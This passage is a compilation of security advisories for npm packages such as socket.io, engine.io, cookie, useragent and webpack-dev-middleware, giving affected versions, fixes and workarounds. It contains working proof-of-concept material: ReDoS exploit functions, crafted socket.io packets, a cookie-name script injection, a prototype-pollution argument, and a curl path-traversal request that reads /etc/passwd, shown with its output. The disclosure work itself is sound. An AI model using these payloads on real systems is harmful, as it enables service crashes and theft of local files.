at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest | Nothing to do |
| 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) |
| 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 is vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all users of the engine.io package, including those who use dependent packages like socket.io.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y | 3.6.1 |
| engine.io@6.x.y | 6.2.1 |
For socket.io users:

| Version range | engine.io version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------|
| socket.io@4.5.x | ~6.2.0 | npm audit fix should be sufficient |
| socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.5.x |
| socket.io@4.0.x | ~5.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@3.1.x | ~4.1.0 | Please upgrade to socket.io@4.5.x (see here) |
| socket.io@3.0.x | ~4.0.0 | Please upgrade to socket.io@4.5.x (see here) |
| socket.io@2.5.0 | ~3.6.0 | npm audit fix should be sufficient |
| socket.io@2.4.x and below | ~3.5.0 | Please upgrade to socket.io@2.5.0 |
There is no known workaround except upgrading to a safe version.
Thanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting the userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
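Run against a vulnerable version, the example above looks like this (a sketch):

const cookie = require('cookie'); // vulnerable: < 0.7.0

// The unvalidated name escapes its field and sets extra cookie attributes.
const header = cookie.serialize(
  "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a",
  'test'
);
console.log(header);
// userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test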
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields; ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
function exploit() {
  const parseuri = require("parse-uri");
  // This input is designed to cause excessive backtracking in the regex
  const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
  const result = parseuri(craftedInput);
}

exploit();
Improper Certificate Validation in xmlhttprequest-ssl
The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.
xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection
This affects the package xmlhttprequest before 1.7.0 and all versions of the package xmlhttprequest-ssl. Provided requests are sent synchronously (async=false on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22):
- socket.io-parser@4.2.3
- socket.io-parser@3.4.3

Another fix has been released for the 3.3.x branch:
| socket.io version | socket.io-parser version | Needs minor update? |
|---------------------|---------------------------|--------------------------------------|
| 4.5.2...latest | ~4.2.0 (ref) | npm audit fix should be sufficient |
| 4.1.3...4.5.1 | ~4.1.1 (ref) | Please upgrade to socket.io@4.6.x |
| 3.0.5...4.1.2 | ~4.0.3 (ref) | Please upgrade to socket.io@4.6.x |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Please upgrade to socket.io@4.6.x |
| 2.3.0...2.5.0 | ~3.4.0 (ref) | npm audit fix should be sufficient |
There is no known workaround except upgrading to a safe version.
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser library (which is used by the socket.io and socket.io-client packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object, which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const { Decoder } = require("socket.io-parser");
const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Example of values that could be sent by a malicious user:
- A num value that is out of bounds:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
- A num value of undefined:
Sample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
- The name of a method of Array, like "push":
Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
- The name of a method of Object, like "hasOwnProperty":
Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
- socket.io-parser@4.2.1
- socket.io-parser@4.0.5
- socket.io-parser@3.4.2
- socket.io-parser@3.3.3

For the socket.io package:

| socket.io version | socket.io-parser version | Covered? |
|---------------------|---------------------------|------------------------|
| 4.5.2...latest | ~4.2.0 (ref) | Yes :heavy_check_mark: |
| 4.1.3...4.5.1 | ~4.0.4 (ref) | Yes :heavy_check_mark: |
| 3.0.5...4.1.2 | ~4.0.3 (ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Yes :heavy_check_mark: |
| 2.3.0...2.5.0 | ~3.4.0 (ref) | Yes :heavy_check_mark: |

For the socket.io-client package:

| socket.io-client version | socket.io-parser version | Covered? |
|----------------------------|---------------------------|------------------------------------|
| 4.5.0...latest | ~4.2.0 (ref) | Yes :heavy_check_mark: |
| 4.3.0...4.4.1 | ~4.1.1 (ref) | No, but the impact is very limited |
| 3.1.0...4.2.0 | ~4.0.4 (ref) | Yes :heavy_check_mark: |
| 3.0.5 | ~4.0.3 (ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4 | ~4.0.1 (ref) | Yes :heavy_check_mark: |
| 2.2.0...2.5.0 | ~3.3.0 (ref) | Yes :heavy_check_mark: |
Resource exhaustion in socket.io-parser
The socket.io-parser npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
function exploit() {
  const useragent = require("useragent");
  // Create a malicious user-agent that leads to excessive backtracking
  const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
  // Parse the malicious user-agent
  const agent = useragent.parse(maliciousUserAgent);
  // Call the toString method to trigger the vulnerability
  const result = agent.device.toString();
  console.log(result);
}

exploit();
Path traversal in webpack-dev-middleware
The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine.
The middleware can either work with the physical filesystem when reading the files, or it can use a virtualized in-memory memfs filesystem. If the writeToDisk configuration option is set to true, the physical filesystem is used: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21
The getFilenameFromUrl method is used to parse the URL and build the local file path. The public path prefix is stripped from the URL, and the unescaped path suffix is appended to the outputPath: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 As the URL is not unescaped and normalized automatically before calling the middleware, it is possible to use %2e and %2f sequences to perform a path traversal attack.
A blank project can be created containing the following configuration file webpack.config.js:
module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
When started, it is possible to access any local file, e.g. /etc/passwd:
$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
The developers using webpack-dev-server or webpack-dev-middleware are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).
If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, Allow-Access-Origin: * ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.
The URL should be unescaped and normalized before any further processing.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase CPU usage and crash the program by passing a very large, carefully crafted string.
Denial of Service in mem
Versions of mem prior to 4.0.0 are vulnerable to Denial of Service (DoS). The package fails to remove old values from the cache even after a value passes its maxAge property. This may allow attackers to exhaust the system's memory if they are able to abuse the application logging.
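A sketch of the exhaustion pattern on a vulnerable version (input volume is illustrative):

const mem = require('mem'); // vulnerable: < 4.0.0

const memoized = mem(input => input.length, { maxAge: 1000 });

// Entries are never evicted after expiry, so distinct attacker-influenced
// inputs accumulate in the cache indefinitely.
for (let i = 0; i < 1e7; i++) {
  memoized(`request-${i}`);
}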
Upgrade to version 4.0.0 or later.
yargs-parser Vulnerable to Prototype Pollution
Affected versions of yargs-parser are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --foo.__proto__.bar baz adds a bar property with value baz to all objects. This is only exploitable if attackers have control over the arguments being passed to yargs-parser.
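A minimal sketch of the pollution on a vulnerable version:

const parser = require('yargs-parser'); // vulnerable range, e.g. < 13.1.2

parser('--foo.__proto__.bar baz');
// Object.prototype was polluted: every object now carries `bar`.
console.log({}.bar); // "baz" on vulnerable versions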
Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.